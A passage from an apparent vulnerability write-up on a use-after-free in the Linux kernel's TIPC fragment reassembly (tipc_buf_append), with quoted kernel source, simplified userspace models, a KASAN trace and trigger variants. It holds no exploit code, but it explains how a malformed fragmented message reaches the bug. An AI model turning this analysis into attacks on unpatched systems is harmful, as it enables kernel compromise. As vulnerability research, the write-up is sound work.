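	return toy_less_eq(left, right) && left != right;
}

/* Mirror the three outcomes for an incoming seqno on an established link. */
static enum toy_verdict toy_classify(uint16_t seqno, uint16_t rcv_nxt)
{
	uint16_t win_lim = (uint16_t)(rcv_nxt + TOY_MAX_LINK_WIN);

	/* Already seen, or too far ahead of the receive window. */
	if (toy_less(seqno, rcv_nxt) || toy_more(seqno, win_lim))
		return TOY_DROP;
	/* In the window but not next in line: park it on the defer queue. */
	if (seqno != rcv_nxt)
		return TOY_DEFER;
	return TOY_DELIVER;
}
```

<p>The signed cast is what keeps this working across the 65535 to 0 rollover: a <code>seqno</code> of 2 still counts as &ldquo;ahead&rdquo; of a <code>rcv_nxt</code> of 65535 rather than far behind it.</p>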
<p><code>tipc_link_input()</code>, #0, processes the packet depending on the user:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">static int tipc_link_input(struct tipc_link *l, struct sk_buff *skb,
</span></span><span class="line"><span class="cl">               struct sk_buff_head *inputq,
</span></span><span class="line"><span class="cl">               struct sk_buff **reasm_skb)
</span></span><span class="line"><span class="cl">{
</span></span><span class="line"><span class="cl">    // snip
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    } else if (usr == MSG_FRAGMENTER) {
</span></span><span class="line"><span class="cl">        l-&gt;stats.recv_fragments++;
</span></span><span class="line"><span class="cl">        if (tipc_buf_append(reasm_skb, &amp;skb)) {
</span></span><span class="line"><span class="cl">            l-&gt;stats.recv_fragmented++;
</span></span><span class="line"><span class="cl">            tipc_data_input(l, skb, inputq);
</span></span><span class="line"><span class="cl">        } else if (!*reasm_skb &amp;&amp; !link_is_bc_rcvlink(l)) {
</span></span><span class="line"><span class="cl">            pr_warn_ratelimited(&#34;Unable to build fragment list\n&#34;);
</span></span><span class="line"><span class="cl">            return tipc_link_fsm_evt(l, LINK_FAILURE_EVT);
</span></span><span class="line"><span class="cl">        }
</span></span><span class="line"><span class="cl">        return 0;
</span></span><span class="line"><span class="cl">    } // snip
</span></span><span class="line"><span class="cl">    
</span></span><span class="line"><span class="cl">    kfree_skb(skb);
</span></span><span class="line"><span class="cl">    return 0;
</span></span><span class="line"><span class="cl">}
</span></span></code></pre></div><p><a href="https://elixir.bootlin.com/linux/v6.7.4/source/net/tipc/link.c#L1319">net/tipc/link.c</a> (6.7.4)</p>
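<p>The <code>MSG_FRAGMENTER</code> branch above leans on a three-way outcome from the append call: reassembly complete, reassembly still in progress, or an error that leaves no reassembly buffer behind. Here&rsquo;s a toy userspace model of that contract. It deliberately ignores memory ownership, validation and the broadcast link check, all the <code>toy_</code> names are hypothetical, and it is only meant to show the control flow, not the kernel implementation.</p>

```c
#include <assert.h>
#include <stddef.h>

enum { TOY_FIRST_FRAGMENT, TOY_FRAGMENT, TOY_LAST_FRAGMENT };
enum toy_outcome { TOY_IN_PROGRESS, TOY_DELIVERED, TOY_LINK_FAILURE };

/* Toy buffer: a fragment id plus a byte count, no actual payload. */
struct toy_buf {
	int fragid;
	unsigned int len;
};

/* Toy append with the same in/out pointer contract:
 * returns 1 and sets *buf to the head once the last fragment arrives,
 * returns 0 with *headbuf set while reassembly is ongoing,
 * returns 0 with *headbuf NULL on error. */
static int toy_buf_append(struct toy_buf **headbuf, struct toy_buf **buf)
{
	struct toy_buf *head = *headbuf;
	struct toy_buf *frag = *buf;

	if (!frag)
		goto err;
	if (frag->fragid == TOY_FIRST_FRAGMENT) {
		if (head) /* a reassembly is already in flight */
			goto err;
		*buf = NULL;
		*headbuf = frag;
		return 0;
	}
	if (!head) /* middle or last fragment with nothing to append to */
		goto err;
	head->len += frag->len;
	if (frag->fragid == TOY_LAST_FRAGMENT) {
		*buf = head;
		*headbuf = NULL;
		return 1;
	}
	*buf = NULL;
	return 0;
err:
	*buf = *headbuf = NULL;
	return 0;
}

/* Caller side: map the append result onto the three outcomes. */
static enum toy_outcome toy_link_input(struct toy_buf **reasm,
				       struct toy_buf *frag)
{
	if (toy_buf_append(reasm, &frag))
		return TOY_DELIVERED;
	if (!*reasm)
		return TOY_LINK_FAILURE;
	return TOY_IN_PROGRESS;
}
```

<p>Note how a return value of 0 is ambiguous on its own: the caller has to look at whether the reassembly pointer survived to tell &ldquo;keep going&rdquo; apart from &ldquo;something went wrong&rdquo;.</p>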
<h3 id="examining-tipcbufappend">Examining <code>tipc_buf_append()</code></h3>
<p>This function is the root cause of the vulnerability. <code>tipc_buf_append()</code> is used to append the buffers containing message fragments, in order to reassemble the original message:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="cm">/* tipc_buf_append(): Append a buffer to the fragment list of another buffer
</span></span></span><span class="line"><span class="cl"><span class="cm"> * @*headbuf: in:  NULL for first frag, otherwise value returned from prev call
</span></span></span><span class="line"><span class="cl"><span class="cm"> *            out: set when successful non-complete reassembly, otherwise NULL
</span></span></span><span class="line"><span class="cl"><span class="cm"> * @*buf:     in:  the buffer to append. Always defined
</span></span></span><span class="line"><span class="cl"><span class="cm"> *            out: head buf after successful complete reassembly, otherwise NULL
</span></span></span><span class="line"><span class="cl"><span class="cm"> * Returns 1 when reassembly complete, otherwise 0
</span></span></span><span class="line"><span class="cl"><span class="cm"> */</span>
</span></span><span class="line"><span class="cl"><span class="kt">int</span> <span class="nf">tipc_buf_append</span><span class="p">(</span><span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">**</span><span class="n">headbuf</span><span class="p">,</span> <span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">**</span><span class="n">buf</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="p">{</span>
</span></span><span class="line"><span class="cl">	<span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="n">head</span> <span class="o">=</span> <span class="o">*</span><span class="n">headbuf</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="n">frag</span> <span class="o">=</span> <span class="o">*</span><span class="n">buf</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="n">tail</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="k">struct</span> <span class="n">tipc_msg</span> <span class="o">*</span><span class="n">msg</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="n">u32</span> <span class="n">fragid</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="kt">int</span> <span class="n">delta</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="kt">bool</span> <span class="n">headstolen</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">frag</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">		<span class="k">goto</span> <span class="n">err</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	<span class="n">msg</span> <span class="o">=</span> <span class="nf">buf_msg</span><span class="p">(</span><span class="n">frag</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">	<span class="n">fragid</span> <span class="o">=</span> <span class="nf">msg_type</span><span class="p">(</span><span class="n">msg</span><span class="p">);</span>                                     <span class="p">[</span><span class="mi">0</span><span class="p">]</span>
</span></span><span class="line"><span class="cl">	<span class="n">frag</span><span class="o">-&gt;</span><span class="n">next</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="nf">skb_pull</span><span class="p">(</span><span class="n">frag</span><span class="p">,</span> <span class="nf">msg_hdr_sz</span><span class="p">(</span><span class="n">msg</span><span class="p">));</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	<span class="k">if</span> <span class="p">(</span><span class="n">fragid</span> <span class="o">==</span> <span class="n">FIRST_FRAGMENT</span><span class="p">)</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">		<span class="k">if</span> <span class="p">(</span><span class="nf">unlikely</span><span class="p">(</span><span class="n">head</span><span class="p">))</span>
</span></span><span class="line"><span class="cl">			<span class="k">goto</span> <span class="n">err</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">		<span class="o">*</span><span class="n">buf</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">		<span class="k">if</span> <span class="p">(</span><span class="nf">skb_has_frag_list</span><span class="p">(</span><span class="n">frag</span><span class="p">)</span> <span class="o">&amp;&amp;</span> <span class="nf">__skb_linearize</span><span class="p">(</span><span class="n">frag</span><span class="p">))</span>
</span></span><span class="line"><span class="cl">			<span class="k">goto</span> <span class="n">err</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">		<span class="n">frag</span> <span class="o">=</span> <span class="nf">skb_unshare</span><span class="p">(</span><span class="n">frag</span><span class="p">,</span> <span class="n">GFP_ATOMIC</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">		<span class="k">if</span> <span class="p">(</span><span class="nf">unlikely</span><span class="p">(</span><span class="o">!</span><span class="n">frag</span><span class="p">))</span>
</span></span><span class="line"><span class="cl">			<span class="k">goto</span> <span class="n">err</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">		<span class="n">head</span> <span class="o">=</span> <span class="o">*</span><span class="n">headbuf</span> <span class="o">=</span> <span class="n">frag</span><span class="p">;</span>                                 <span class="p">[</span><span class="mi">1</span><span class="p">]</span>
</span></span><span class="line"><span class="cl">		<span class="nf">TIPC_SKB_CB</span><span class="p">(</span><span class="n">head</span><span class="p">)</span><span class="o">-&gt;</span><span class="n">tail</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">		<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="p">}</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">head</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">		<span class="k">goto</span> <span class="n">err</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	<span class="k">if</span> <span class="p">(</span><span class="nf">skb_try_coalesce</span><span class="p">(</span><span class="n">head</span><span class="p">,</span> <span class="n">frag</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">headstolen</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">delta</span><span class="p">))</span> <span class="p">{</span>    <span class="p">[</span><span class="mi">2</span><span class="p">]</span>
</span></span><span class="line"><span class="cl">		<span class="nf">kfree_skb_partial</span><span class="p">(</span><span class="n">frag</span><span class="p">,</span> <span class="n">headstolen</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">	<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>                                                    <span class="p">[</span><span class="mi">3</span><span class="p">]</span>
</span></span><span class="line"><span class="cl">		<span class="n">tail</span> <span class="o">=</span> <span class="nf">TIPC_SKB_CB</span><span class="p">(</span><span class="n">head</span><span class="p">)</span><span class="o">-&gt;</span><span class="n">tail</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">		<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="nf">skb_has_frag_list</span><span class="p">(</span><span class="n">head</span><span class="p">))</span>
</span></span><span class="line"><span class="cl">			<span class="nf">skb_shinfo</span><span class="p">(</span><span class="n">head</span><span class="p">)</span><span class="o">-&gt;</span><span class="n">frag_list</span> <span class="o">=</span> <span class="n">frag</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">		<span class="k">else</span>
</span></span><span class="line"><span class="cl">			<span class="n">tail</span><span class="o">-&gt;</span><span class="n">next</span> <span class="o">=</span> <span class="n">frag</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">		<span class="n">head</span><span class="o">-&gt;</span><span class="n">truesize</span> <span class="o">+=</span> <span class="n">frag</span><span class="o">-&gt;</span><span class="n">truesize</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">		<span class="n">head</span><span class="o">-&gt;</span><span class="n">data_len</span> <span class="o">+=</span> <span class="n">frag</span><span class="o">-&gt;</span><span class="n">len</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">		<span class="n">head</span><span class="o">-&gt;</span><span class="n">len</span> <span class="o">+=</span> <span class="n">frag</span><span class="o">-&gt;</span><span class="n">len</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">		<span class="nf">TIPC_SKB_CB</span><span class="p">(</span><span class="n">head</span><span class="p">)</span><span class="o">-&gt;</span><span class="n">tail</span> <span class="o">=</span> <span class="n">frag</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="p">}</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	<span class="k">if</span> <span class="p">(</span><span class="n">fragid</span> <span class="o">==</span> <span class="n">LAST_FRAGMENT</span><span class="p">)</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">		<span class="nf">TIPC_SKB_CB</span><span class="p">(</span><span class="n">head</span><span class="p">)</span><span class="o">-&gt;</span><span class="n">validated</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">		<span class="k">if</span> <span class="p">(</span><span class="nf">unlikely</span><span class="p">(</span><span class="o">!</span><span class="nf">tipc_msg_validate</span><span class="p">(</span><span class="o">&amp;</span><span class="n">head</span><span class="p">)))</span>                <span class="p">[</span><span class="mi">4</span><span class="p">]</span>
</span></span><span class="line"><span class="cl">			<span class="k">goto</span> <span class="n">err</span><span class="p">;</span>                                           <span class="p">[</span><span class="mi">5</span><span class="p">]</span>
</span></span><span class="line"><span class="cl">		<span class="o">*</span><span class="n">buf</span> <span class="o">=</span> <span class="n">head</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">		<span class="nf">TIPC_SKB_CB</span><span class="p">(</span><span class="n">head</span><span class="p">)</span><span class="o">-&gt;</span><span class="n">tail</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">		<span class="o">*</span><span class="n">headbuf</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">		<span class="k">return</span> <span class="mi">1</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="p">}</span>
</span></span><span class="line"><span class="cl">	<span class="o">*</span><span class="n">buf</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"><span class="nl">err</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">	<span class="nf">kfree_skb</span><span class="p">(</span><span class="o">*</span><span class="n">buf</span><span class="p">);</span>                                            <span class="p">[</span><span class="mi">6</span><span class="p">]</span>
</span></span><span class="line"><span class="cl">	<span class="nf">kfree_skb</span><span class="p">(</span><span class="o">*</span><span class="n">headbuf</span><span class="p">);</span>                                        <span class="p">[</span><span class="mi">7</span><span class="p">]</span>
</span></span><span class="line"><span class="cl">	<span class="o">*</span><span class="n">buf</span> <span class="o">=</span> <span class="o">*</span><span class="n">headbuf</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span></code></pre></div><p><a href="https://elixir.bootlin.com/linux/v6.7.4/source/net/tipc/msg.c#L124">net/tipc/msg.c</a> (6.7.4)</p>
<p>Walking through a typical case, when the first fragment is received <code>tipc_buf_append()</code> is called with <code>*headbuf == NULL</code> &amp; <code>*buf</code> pointing to the packet buffer of the first fragment. Note the fragment id (first, last or other) is stored in the TIPC header [0].</p>
<p>For the first fragment, some checks are done and this buffer is used to initialise <code>headbuf</code> [1] before returning. For subsequent fragments in this sequence, <code>headbuf</code> is already initialised when <code>tipc_buf_append()</code> is called. These packets are then either coalesced into the head buffer [2] or added to its <code>frag_list</code> [3].</p>
<p>Finally, when the <code>LAST_FRAGMENT</code> is processed and added to the chain, the header of the originally fragmented message is validated [4]. If you recall, the fragmented message is stored within the <code>MSG_FRAGMENTER</code> messages, so it will have its own header that hasn&rsquo;t been validated yet.</p>
<p>Notably, if this fails (e.g. we intentionally scuff up the header of the fragmented message), we jump to the error path [5] and both buffers are dropped [6] [7]. At this point <code>buf</code> points to the last fragment and <code>headbuf</code> points to the head buffer (the first fragment). As we&rsquo;ve seen, it is possible for <code>buf</code> to be in the <code>frag_list</code> of <code>headbuf</code> at this point.</p>
<p>However, <code>kfree_skb()</code> isn&rsquo;t a simple <code>kfree()</code> wrapper, due to the complexity of <code>struct sk_buff</code>. It involves quite a bit of cleanup, including cleaning up the fragments referenced by the <code>frag_list</code> &hellip; you can probably see where this is going!</p>
<p>The last fragment, <code>buf</code>, is freed [6]. Then, the head buffer is freed [7] whereby its <code>frag_list</code> is iterated for cleanup, leading to a use-after-free, as the final fragment has just been freed prior to this call [6]!</p>
<p>We can see this by exploring the rest of the call trace when we trigger the bug:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">[   48.900496] ==================================================================
</span></span><span class="line"><span class="cl">[   48.901414] BUG: KASAN: slab-use-after-free in kfree_skb_list_reason+0x549/0x5c0
</span></span><span class="line"><span class="cl">[   48.902395] Read of size 8 at addr ffff88800927c900 by task syz_test/207
</span></span><span class="line"><span class="cl">[   48.903256] 
</span></span><span class="line"><span class="cl">[   48.903450] CPU: 1 PID: 207 Comm: syz_test Not tainted 6.7.4-gd09175322cfa-dirty #6
</span></span><span class="line"><span class="cl">[   48.904221] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.15.0-1 04/01/2014
</span></span><span class="line"><span class="cl">[   48.905046] Call Trace:
</span></span><span class="line"><span class="cl">[   48.905306]  &lt;IRQ&gt;
</span></span><span class="line"><span class="cl">[   48.905490]  dump_stack_lvl+0x72/0xa0
</span></span><span class="line"><span class="cl">[   48.905787]  print_report+0xcc/0x620
</span></span><span class="line"><span class="cl">[   48.906736]  kasan_report+0xb0/0xe0
</span></span><span class="line"><span class="cl">[   48.907096]  kfree_skb_list_reason+0x549/0x5c0
</span></span><span class="line"><span class="cl">[   48.909613]  skb_release_data.isra.0+0x4fd/0x850
</span></span><span class="line"><span class="cl">[   48.909997]  kfree_skb_reason+0xf4/0x380
</span></span><span class="line"><span class="cl">[   48.910171]  tipc_buf_append+0x3e4/0xad0
</span></span></code></pre></div><p>KASAN is triggered when the fragment list is iterated in <code>kfree_skb_list_reason()</code>, which is passed the <code>frag_list</code> of the head buffer in <code>skb_release_data()</code> [0]:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="k">static</span> <span class="kt">void</span> <span class="nf">skb_release_data</span><span class="p">(</span><span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="n">skb</span><span class="p">,</span> <span class="k">enum</span> <span class="n">skb_drop_reason</span> <span class="n">reason</span><span class="p">,</span>
</span></span><span class="line"><span class="cl">			     <span class="kt">bool</span> <span class="n">napi_safe</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="p">{</span>
</span></span><span class="line"><span class="cl">	<span class="k">struct</span> <span class="n">skb_shared_info</span> <span class="o">*</span><span class="n">shinfo</span> <span class="o">=</span> <span class="nf">skb_shinfo</span><span class="p">(</span><span class="n">skb</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">	<span class="kt">int</span> <span class="n">i</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="c1">// snip
</span></span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="nl">free_head</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">	<span class="k">if</span> <span class="p">(</span><span class="n">shinfo</span><span class="o">-&gt;</span><span class="n">frag_list</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">		<span class="nf">kfree_skb_list_reason</span><span class="p">(</span><span class="n">shinfo</span><span class="o">-&gt;</span><span class="n">frag_list</span><span class="p">,</span> <span class="n">reason</span><span class="p">);</span>                       <span class="p">[</span><span class="mi">0</span><span class="p">]</span>
</span></span></code></pre></div><p><a href="https://elixir.bootlin.com/linux/v6.7.4/source/net/core/skbuff.c#L966">net/core/skbuff.c</a> (6.7.4)</p>
<p>We can then see the KASAN trigger in <code>kfree_skb_list_reason()</code> here [1]:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="kt">void</span> <span class="n">__fix_address</span>
</span></span><span class="line"><span class="cl"><span class="nf">kfree_skb_list_reason</span><span class="p">(</span><span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="n">segs</span><span class="p">,</span> <span class="k">enum</span> <span class="n">skb_drop_reason</span> <span class="n">reason</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="p">{</span>
</span></span><span class="line"><span class="cl">	<span class="k">struct</span> <span class="n">skb_free_array</span> <span class="n">sa</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	<span class="n">sa</span><span class="p">.</span><span class="n">skb_count</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	<span class="k">while</span> <span class="p">(</span><span class="n">segs</span><span class="p">)</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">		<span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="n">next</span> <span class="o">=</span> <span class="n">segs</span><span class="o">-&gt;</span><span class="n">next</span><span class="p">;</span>                                      <span class="p">[</span><span class="mi">1</span><span class="p">]</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">		<span class="k">if</span> <span class="p">(</span><span class="nf">__kfree_skb_reason</span><span class="p">(</span><span class="n">segs</span><span class="p">,</span> <span class="n">reason</span><span class="p">))</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">			<span class="nf">skb_poison_list</span><span class="p">(</span><span class="n">segs</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">			<span class="nf">kfree_skb_add_bulk</span><span class="p">(</span><span class="n">segs</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">sa</span><span class="p">,</span> <span class="n">reason</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">		<span class="p">}</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">		<span class="n">segs</span> <span class="o">=</span> <span class="n">next</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="p">}</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	<span class="k">if</span> <span class="p">(</span><span class="n">sa</span><span class="p">.</span><span class="n">skb_count</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">		<span class="nf">kmem_cache_free_bulk</span><span class="p">(</span><span class="n">skbuff_cache</span><span class="p">,</span> <span class="n">sa</span><span class="p">.</span><span class="n">skb_count</span><span class="p">,</span> <span class="n">sa</span><span class="p">.</span><span class="n">skb_array</span><span class="p">);</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span></code></pre></div><p><a href="https://elixir.bootlin.com/linux/v6.7.4/source/net/core/skbuff.c#L1140">net/core/skbuff.c</a> (6.7.4)</p>
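<p>To make the ordering concrete, here&rsquo;s a rough userspace sketch of the error path. It&rsquo;s a toy model rather than kernel code: <code>struct toy_skb</code>, <code>toy_kfree_skb()</code> and friends are names made up for illustration, and a <code>freed</code> flag stands in for the real free so the stale access can be counted instead of actually corrupting memory.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-c" data-lang="c">#include &lt;stdbool.h&gt;

/* Hypothetical stand-in for struct sk_buff, reduced to what the walk needs. */
struct toy_skb {
	struct toy_skb *next;      /* like skb-&gt;next */
	struct toy_skb *frag_list; /* like skb_shinfo(skb)-&gt;frag_list */
	bool freed;                /* set instead of really freeing */
};

static int stale_reads; /* reads of a toy_skb that was already freed */

static void toy_kfree_skb(struct toy_skb *skb);

/* Same shape as kfree_skb_list_reason(): read -&gt;next, then free the node. */
static void toy_kfree_skb_list(struct toy_skb *segs)
{
	while (segs) {
		if (segs-&gt;freed)
			stale_reads++; /* the model's version of the KASAN report */
		struct toy_skb *next = segs-&gt;next;

		toy_kfree_skb(segs);
		segs = next;
	}
}

/* Free one buffer and everything chained on its frag_list. */
static void toy_kfree_skb(struct toy_skb *skb)
{
	if (!skb || skb-&gt;freed)
		return; /* the model ignores the double free, the kernel would not */
	skb-&gt;freed = true;
	toy_kfree_skb_list(skb-&gt;frag_list);
}

/* Error path of the vulnerable function: free *buf, then *headbuf. */
static int toy_err_path(struct toy_skb *buf, struct toy_skb *headbuf)
{
	stale_reads = 0;
	toy_kfree_skb(buf);
	toy_kfree_skb(headbuf);
	return stale_reads;
}

/* A head with two chained fragments, where the last one fails validation. */
static int toy_demo(void)
{
	struct toy_skb last = {0}, mid = {0}, head = {0};

	mid.next = &amp;last;
	head.frag_list = &amp;mid;
	return toy_err_path(&amp;last, &amp;head);
}
</code></pre></div><p>With a head and two chained fragments, <code>toy_demo()</code> counts a single stale read: the list walk reaches the last fragment after it has already been freed via <code>buf</code>, which lines up with the read of <code>segs-&gt;next</code> that KASAN flags.</p>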
<h3 id="variations">Variations</h3>
<p><img src="https://sam4k.com/content/images/2024/04/there-smore.gif" alt=""></p>
<p>There&rsquo;s a couple of variations to this vulnerability which are worth mentioning. First of all, the vulnerable path can also be reached in a very similar manner via <code>TUNNEL_PROTOCOL</code> messages, as seen in this call trace:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">kfree_skb_reason+0xf4/0x380 net/core/skbuff.c:1108
</span></span><span class="line"><span class="cl">kfree_skb include/linux/skbuff.h:1234 [inline]
</span></span><span class="line"><span class="cl">tipc_buf_append+0x3ce/0xb50 net/tipc/msg.c:186
</span></span><span class="line"><span class="cl">tipc_link_tnl_rcv net/tipc/link.c:1398 [inline]
</span></span><span class="line"><span class="cl">tipc_link_rcv+0x1a89/0x2dc0 net/tipc/link.c:1837
</span></span><span class="line"><span class="cl">tipc_rcv+0x1220/0x3030 net/tipc/node.c:2173
</span></span><span class="line"><span class="cl">tipc_udp_recv+0x745/0x930 net/tipc/udp_media.c:421
</span></span></code></pre></div><p>Additionally, some eagle-eyed readers may also have noticed there&rsquo;s another way to trigger the use-after-free within <code>tipc_buf_append()</code>:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="kt">int</span> <span class="nf">tipc_buf_append</span><span class="p">(</span><span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">**</span><span class="n">headbuf</span><span class="p">,</span> <span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">**</span><span class="n">buf</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="p">{</span>
</span></span><span class="line"><span class="cl">    <span class="c1">// snip
</span></span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="k">if</span> <span class="p">(</span><span class="nf">skb_try_coalesce</span><span class="p">(</span><span class="n">head</span><span class="p">,</span> <span class="n">frag</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">headstolen</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">delta</span><span class="p">))</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">        <span class="nf">kfree_skb_partial</span><span class="p">(</span><span class="n">frag</span><span class="p">,</span> <span class="n">headstolen</span><span class="p">);</span>                        <span class="p">[</span><span class="mi">0</span><span class="p">]</span>
</span></span><span class="line"><span class="cl">    <span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">        <span class="n">tail</span> <span class="o">=</span> <span class="nf">TIPC_SKB_CB</span><span class="p">(</span><span class="n">head</span><span class="p">)</span><span class="o">-&gt;</span><span class="n">tail</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">        <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="nf">skb_has_frag_list</span><span class="p">(</span><span class="n">head</span><span class="p">))</span>
</span></span><span class="line"><span class="cl">            <span class="nf">skb_shinfo</span><span class="p">(</span><span class="n">head</span><span class="p">)</span><span class="o">-&gt;</span><span class="n">frag_list</span> <span class="o">=</span> <span class="n">frag</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">        <span class="k">else</span>
</span></span><span class="line"><span class="cl">            <span class="n">tail</span><span class="o">-&gt;</span><span class="n">next</span> <span class="o">=</span> <span class="n">frag</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">        <span class="n">head</span><span class="o">-&gt;</span><span class="n">truesize</span> <span class="o">+=</span> <span class="n">frag</span><span class="o">-&gt;</span><span class="n">truesize</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">        <span class="n">head</span><span class="o">-&gt;</span><span class="n">data_len</span> <span class="o">+=</span> <span class="n">frag</span><span class="o">-&gt;</span><span class="n">len</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">        <span class="n">head</span><span class="o">-&gt;</span><span class="n">len</span> <span class="o">+=</span> <span class="n">frag</span><span class="o">-&gt;</span><span class="n">len</span><span class="p">;</span>
